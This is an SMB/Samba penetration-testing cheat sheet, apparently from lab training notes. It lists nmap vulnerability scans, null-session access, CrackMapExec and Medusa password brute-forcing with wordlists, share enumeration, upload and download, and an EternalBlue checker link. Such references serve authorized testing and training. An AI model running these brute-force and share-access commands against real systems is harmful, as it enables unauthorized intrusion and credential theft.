SMB / Samba 135-139, 445

Nmap SMB Enumeration Commands

SMB Security Mode:

nmap --script=smb2-security-mode.nse -p 445 192.168.10.0/24

Basic SMB Scan:

sudo nmap -v -p 139,445 -oG smb.txt 10.11.1.8

NetBIOS Stats and SMB OS Discovery:

sudo nmap --script nbstat.nse 10.11.1.5
sudo nmap --script smb-os-discovery 10.11.1.5

Enumerating SMB Shares:

nmap --script smb-enum-shares -p139,445 10.11.1.5

Scanning for SMB Vulnerabilities:

sudo nmap --script smb-vuln* 10.11.1.5
sudo nmap -v -p 139,445 --script=smb-vuln* --script-args=unsafe=1 10.11.1.5

Scan for SMB Shares with Credentials (if known):

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p 445 10.11.1.0/24

One-liner to Check Multiple SMB Vulnerabilities:

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10

Full SMB Scan with OS Detection:

sudo nmap -A -p 135 --open 10.11.1.0/24 -oG nmap135

Metasploit SMB Enumeration

Enumerating SMB Shares:

use auxiliary/scanner/smb/smb_enumshares

Lookup SID Information:

use auxiliary/scanner/smb/smb_lookupsid

Banner Grabbing

Using Netcat (nc) to Banner Grab on Port 135:

nc -nv 10.11.1.5 135

CrackMapExec (CME) for SMB

Basic Command:

crackmapexec smb 10.11.1.128

Using Credentials:

crackmapexec smb 10.11.1.128 -u 'username' -p 'password'

Brute-Force SMB Login Using a Wordlist:

crackmapexec smb 10.11.1.128 -u "DJ" -p /usr/share/dirb/wordlists/mutations_common.txt
crackmapexec smb 10.11.1.136 -u root -p /usr/share/wordlists/rockyou.txt

Null Session (No Username/Password):

crackmapexec smb 10.11.1.146 -u 'guest' -p ''  # Null session

Listing Shares without Credentials:

crackmapexec smb 10.11.1.146 -u '' -p '' --shares

RPCClient (Null Session)

Connecting with Null Session:

rpcclient -U "" -N 10.11.1.5

Ridenum - SMB Brute-Force (Dictionary-based)

Bruteforce SMB Users with Dictionary:

ridenum.py 10.10.10.10 500 50000 dict.txt

Null Session

Windows Command (Net Use):

net use \\10.10.10.10\ "" /u:""

inux Command (Smbclient):

smbclient -L //10.10.10.10

Smbmap

Basic SMB Mapping Command:

smbmap -H 10.11.1.5 -P 135

Login and Access Shares:

smbmap -u "root" -p "123456" -R Bob -H 10.11.1.136 -P 445

Listing Shares:

smbclient -L 10.11.1.5

Accessing a Share (guest access):

smbclient //10.11.1.5/guest

Upload a File to Share:

smbmap -H //10.10.10.10/ --upload test.txt /SHARENAME/test.txt

Bruteforce SMB Login

Using Medusa for SMB Bruteforce:

medusa -h 10.11.1.111 -u redcliff -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt

Using Nmap for SMB Bruteforce:

nmap -p445 --script smb-brute --script-args userdb=user.txt,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 10.11.1.111 -vvvv

Smbget for Downloading SMB Shares

Recursive Download from SMB Share:

smbget -rR smb://192.168.101.83/sambashare -U guest

EternalBlue Exploit (MS17-010)

Run EternalBlue Checker: Clone the repository from GitHub and run eternal_checker.py against the target:

https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternal_checker.py

Mounting SMB Shares

Creating a Temporary Share Folder on Linux:

sudo mkdir /tmp/share

Mount the SMB Share:

sudo mount -t cifs //10.11.1.146/SusieShare /tmp/share